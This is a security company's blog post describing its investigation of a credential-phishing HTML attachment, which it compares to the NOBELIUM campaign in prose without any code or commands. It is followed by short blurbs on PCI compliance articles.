/
/
Active Threat Investigations – June 2021

Active Threat Investigations – June 2021

Share

Active Threat – Credential Stealing Email Located

We recently had a phishing investigation into an email with an HTML attachment that caught our eye. The reason being is that Microsoft just recently posted about an ongoing attack from NOBELIUM which had a similar delivery technique to this investigation. The NOBELIUM attack structure was Phishing Email > HTML attachment > HTML Smuggling > Drop an ISO which drops an LNK file that will execute the Cobalt Strike Beacon loader. There’s a bit more to it than that but the HTML smuggling is where the path’s diverged with this attack luckily.

After we obtained the email from the client, we were able to dig into what was going on inside of the HTML attachment. The HTML was ‘obfuscated’, well when I say obfuscated, I really mean they “escaped” the characters in the document, something that is common with web requests. Very trivially, we were able to get the plaintext of the document and started to dig deeper into the functionality.

There were quite a few interesting things to note in this phishing campaign. The adversary did a great job at trying not to alert a user that they were in fact stealing their credentials. If a user reloaded the page more than 3 times the document would say “Scanned File Locked! Redirecting you back to your account” and would then take them back to Outlook. Also, it would prompt the user twice to enter their password telling them it was wrong each time (this is smart because many people mistype their password the first time) then the third time it would say “Scanned File Locked” and redirect them back to their Outlook page. The JavaScript on the page also dynamically pulled the image of the company off a website called Statvoo.com based on the domain name of the targeted user to make the attack even more convincing. The website that the credentials are sent to was created 5-19-2021 and is hosting a default WordPress page with no content on it. We’ve since reported the site to the hosting provider and are waiting for it to be taken down.

We did not find any evidence of malware or a dropper functionality inside of the HTML file therefore our best recommendation was to change the affected user’s passwords.

Subscribe to Our Newsletter

ON WATCH, ALL THE TIME

Featured Articles

Point-to-Point Encryption (P2PE) in the payment card industry involves deploying a recognized solution by the PCI council, where hardware, processes, and technology undergo rigorous testing against the current P2PE Standard v3.1 or earlier versions. The P2PE standard combines a recognized and certified PTS device with software and encryption methods to allow cardholder data to be encrypted upon swipe and transmitted encrypted throughout the merchant environment until decrypted within a decryption environment, inaccessible to the merchant.
In today’s rapidly evolving cybersecurity landscape, achieving and maintaining PCI compliance is more critical than ever. With the latest update to PCI DSS 4.0.1, businesses must adapt to meet new standards designed to enhance security and flexibility. This updated PCI Compliance Checklist outlines the essential steps for staying compliant while optimizing your organization’s security posture.
As with many things in popular culture, the PCI Data Security Standard (PCI DSS) has many myths associated with it. The PCI DSS has existed for many years and despite the efforts of the PCI Security Standards Council (PCI SSC) and industry experts, many misconceptions and myths persist. Below we will cover some common PCI DSS myths vs. the reality.
The PCI DSS standard is largely responsible for dictating the way organizations all over the world approach cybersecurity and the protection of credit card data. As v4.0 of the standard approaches, organizations should aim to identify and plan updates for the aspects of their security and compliance programs that are most likely to be affected.
Employees of companies of all sizes are now either required to shelter in place or State and Government lock-downs are forcing companies to require their employees to work remotely. How will this impact your PCI-DSS Compliance?